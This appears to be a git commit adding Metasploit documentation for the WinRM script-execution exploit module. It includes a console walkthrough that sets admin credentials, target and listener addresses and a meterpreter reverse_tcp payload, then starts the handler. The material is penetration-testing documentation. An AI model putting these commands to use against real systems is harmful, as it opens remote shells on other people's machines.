Documentation on winrm_script_exec

2017-03-19 18:27:00 +05:30 · 2017-03-19 18:27:00 +05:30 · 5ab0129f0f
parent c2f603d0fe
commit 5ab0129f0f
1 changed files with 67 additions and 0 deletions
--- a/documentation/modules/exploit/winrm/winrm_script_exec.md
+++ b/documentation/modules/exploit/winrm/winrm_script_exec.md
@ -0,0 +1,67 @@
 ## Vulnerable Application
 Windows Remote Management (WinRM) is a feature of Windows Vista that allows administrators to remotely run management scripts. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol).   This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy.
 IMPORTANT: If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. 
 [EXPLOIT DB:] https://www.exploit-db.com/exploits/22526/
 ## Example Usage
 ```
 msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
 msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
 msf exploit(winrm_script_exec) > set USERNAME admin
 USERNAME => admin
 msf exploit(winrm_script_exec) > set PASSWORD admin
 PASSWORD => admin
 msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
 LHOST => 192.168.198.138
 msf exploit(winrm_script_exec) > set LPORT 4444
 LPORT => 4444
 msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
 RHOST => 192.168.198.130
 msf exploit(winrm_script_exec) > show options
 Module options (exploit/windows/winrm/winrm_script_exec):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     WORKSTATION      yes       The domain to use for Windows authentification
   FORCE_VBS  false            yes       Force the module to use the VBS CmdStager
   PASSWORD   admin            yes       A specific password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.198.130  yes       The target address
   RPORT      5985             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URI        /wsman           yes       The URI of the WinRM service
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            yes       A specific username to authenticate as
   VHOST                       no        HTTP server virtual host
 Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.198.138  yes       The listen address
   LPORT     4444             yes       The listen port
 Exploit target:
   Id  Name
   --  ----
   0   Windows
 msf exploit(winrm_script_exec) > run
 [*] Started reverse TCP handler on 192.168.198.138:4444